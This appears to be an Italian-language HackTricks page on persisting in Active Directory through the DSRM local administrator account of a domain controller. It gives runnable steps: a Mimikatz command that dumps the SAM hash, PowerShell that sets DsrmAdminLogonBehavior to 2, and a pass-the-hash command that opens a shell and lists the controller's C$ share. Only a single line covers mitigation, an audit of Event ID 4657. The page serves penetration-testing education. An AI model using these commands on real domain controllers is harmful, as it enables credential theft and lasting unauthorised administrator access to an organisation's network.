4.2 KiB
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!
Altri modi per supportare HackTricks:
- Se vuoi vedere la tua azienda pubblicizzata in HackTricks o scaricare HackTricks in PDF Controlla i PIANI DI ABBONAMENTO!
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Scopri The PEASS Family, la nostra collezione di esclusive NFT
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos di github.
Credenziali DSRM
All'interno di ogni DC è presente un account amministratore locale. Avendo i privilegi di amministratore in questa macchina, puoi utilizzare mimikatz per estrarre l'hash dell'amministratore locale. Successivamente, modificando un registro per attivare questa password, puoi accedere in remoto a questo utente Amministratore locale.
Prima di tutto, dobbiamo estrarre l'hash dell'utente Amministratore locale all'interno del DC:
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
Dopo di che, è necessario verificare se quell'account funzionerà e se la chiave del registro ha il valore "0" o non esiste, è necessario impostarla su "2":
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 #Change value to "2"
Successivamente, utilizzando un PTH, è possibile elencare il contenuto di C$ o addirittura ottenere una shell. Nota che per creare una nuova sessione di PowerShell con l'hash in memoria (per il PTH) il "dominio" utilizzato è semplicemente il nome della macchina DC:
sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$
Ulteriori informazioni su questo argomento sono disponibili su: https://adsecurity.org/?p=1714 e https://adsecurity.org/?p=1785
Mitigazione
- Evento ID 4657 - Audit della creazione/modifica di
HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!
Altri modi per supportare HackTricks:
- Se vuoi vedere la tua azienda pubblicizzata su HackTricks o scaricare HackTricks in PDF controlla i PACCHETTI DI ABBONAMENTO!
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Scopri The PEASS Family, la nostra collezione di esclusive NFT
- Unisciti al 💬 gruppo Discord o al gruppo Telegram o seguici su Twitter 🐦 @carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR ai repository github di HackTricks e HackTricks Cloud.